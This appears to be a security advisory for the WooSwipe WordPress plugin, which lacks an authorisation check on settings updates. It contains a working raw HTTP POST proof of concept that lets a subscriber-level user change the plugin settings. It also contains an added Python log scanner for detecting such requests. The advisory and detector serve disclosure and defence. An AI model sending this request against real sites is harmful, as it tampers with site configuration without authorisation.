The plugin does not perform any authorisation check when updating its settings, which could allow any authenticated user, such as a subscriber, to update them.

POST /wp-admin/admin.php?page=wooswipe-options HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------1848431393440185984976916911
Content-Length: 565
Connection: close
Cookie: [subscriber+]
Upgrade-Insecure-Requests: 1

-----------------------------1848431393440185984976916911
Content-Disposition: form-data; name="white_theme"

checkbox
-----------------------------1848431393440185984976916911
Content-Disposition: form-data; name="icon_bg_color"

#000000
-----------------------------1848431393440185984976916911
Content-Disposition: form-data; name="icon_stroke_color"

#ffffff
-----------------------------1848431393440185984976916911
Content-Disposition: form-data; name="wooswipe_save"

Save Changes
-----------------------------1848431393440185984976916911--

Even though the response will be a 403, the settings will be updated.
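
Because the request above is answered with a 403 while the settings still change, a POST to the wooswipe-options page that returned 403 is worth reviewing in the web server access log. The following is an added detection example, not part of the original advisory or the plugin's code; it assumes logs in Combined Log Format, and the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def is_suspect(line):
    """Return (ip, time) for a POST to the wooswipe-options page that got a 403, else None."""
    m = LINE_RE.match(line)
    if not m or m["method"] != "POST" or m["status"] != "403":
        return None
    url = urlsplit(m["target"])
    # endswith() also covers WordPress installed in a subdirectory.
    if not url.path.endswith("/wp-admin/admin.php"):
        return None
    # Parse the query string so parameter order and extra parameters do not matter.
    if "wooswipe-options" not in parse_qs(url.query).get("page", []):
        return None
    return m["ip"], m["time"]

def scan(lines):
    """Return every (ip, time) hit found in an iterable of log lines."""
    return [hit for hit in map(is_suspect, lines) if hit]

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Mar/2024:10:01:02 +0000] "POST /wp-admin/admin.php?page=wooswipe-options HTTP/1.1" 403 1532 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Mar/2024:10:02:10 +0000] "POST /wp-admin/admin.php?page=wooswipe-options HTTP/1.1" 200 8421 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Mar/2024:10:03:00 +0000] "GET /wp-admin/admin.php?page=wooswipe-options HTTP/1.1" 403 1532 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [12/Mar/2024:10:04:00 +0000] "POST /blog/wp-admin/admin.php?foo=1&page=wooswipe-options HTTP/1.1" 403 1532 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [12/Mar/2024:10:05:00 +0000] "POST /wp-admin/admin.php?page=other-plugin HTTP/1.1" 403 1532 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, when in scan(SAMPLE_LOG):
        print(f"review settings change: POST wooswipe-options -> 403 from {ip} at {when}")
```

A hit is a lead, not proof: a 403 can also come from a WAF or other access rule, so compare the stored plugin settings against their expected values for the time of each hit.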